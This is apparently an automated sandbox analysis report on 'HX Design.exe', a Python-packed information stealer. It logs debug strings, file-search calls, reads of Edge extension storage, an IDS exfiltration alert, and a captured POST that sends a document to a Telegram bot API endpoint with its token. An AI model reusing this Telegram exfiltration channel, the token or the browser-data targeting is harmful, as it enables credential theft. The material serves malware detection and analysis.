              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671162659.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: HX Design.exe, HX Design.exe, 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672433558.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672984815.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: HX Design.exe, 00000001.00000002.2109362535.00007FFE0E15E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672530678.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670566316.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672894743.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: HX Design.exe, 00000001.00000002.2104758778.00007FFDFB152000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: HX Design.exe, 00000000.00000003.1667874865.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2113107108.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672006597.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670164178.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671342461.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672623593.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670069107.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669582469.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670867826.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: HX Design.exe, 00000001.00000002.2110372375.00007FFE10301000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669673863.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669771704.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671427459.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672181668.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672711559.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672006597.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669381520.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: HX Design.exe, 00000001.00000002.2112292200.00007FFE13301000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669582469.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: HX Design.exe, 00000001.00000002.2108765974.00007FFE01424000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: HX Design.exe, 00000001.00000002.2111882351.00007FFE13201000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672181668.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672894743.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: HX Design.exe, 00000001.00000002.2104253662.00007FFDFAD87000.00000040.00000001.01000000.00000016.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: HX Design.exe, 00000001.00000002.2104758778.00007FFDFB1EA000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: HX Design.exe, 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671060451.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669865054.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669381520.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672094828.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672623593.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: HX Design.exe, HX Design.exe, 00000001.00000002.2104758778.00007FFDFB1EA000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.pdb source: powershell.exe, 00000028.00000002.1879970672.000001D183AA6000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670262264.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000049.00000002.1967359399.00007FF77D260000.00000002.00000001.01000000.00000024.sdmp, rar.exe, 00000049.00000000.1955536544.00007FF77D260000.00000002.00000001.01000000.00000024.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672530678.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1673205368.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671919991.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671253398.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: HX Design.exe, 00000000.00000003.1669963061.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: HX Design.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: HX Design.exe, 00000001.00000002.2110062071.00007FFE1025B000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670376660.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: HX Design.exe, 00000001.00000002.2111353721.00007FFE12E11000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670667043.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672807365.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: HX Design.exe, 00000000.00000003.1670955519.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: HX Design.exe, 00000001.00000002.2109756879.00007FFE0EB41000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672094828.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7320683C0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732069280 FindFirstFileExW,FindClose,0_2_00007FF732069280
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732081874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF732081874
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF732069280 FindFirstFileExW,FindClose,1_2_00007FF732069280
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF7320683C0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF732081874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF732081874
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2146EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,73_2_00007FF77D2146EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2588E0 FindFirstFileExA,73_2_00007FF77D2588E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D20E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,73_2_00007FF77D20E21C
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\Jump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2857751 - Severity 1 - ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST) : 192.168.2.4:49760 -> 149.154.167.220:443
              Source: unknownDNS query: name: api.telegram.org
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: global trafficDNS traffic detected: DNS query: blank-zlvej.in
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot7941165298:AAE-cxddvAA5WE9BKSZYSVJTX3zwZRZqwIw/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 677534User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=96c8c802dc2959601b7d52be2a215a8e
              Source: HX Design.exe, 00000001.00000002.2101621757.00000294B52BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
              Source: msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162v
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517D
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206N
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577Z
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
              Source: chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586e
              Source: msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586v
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
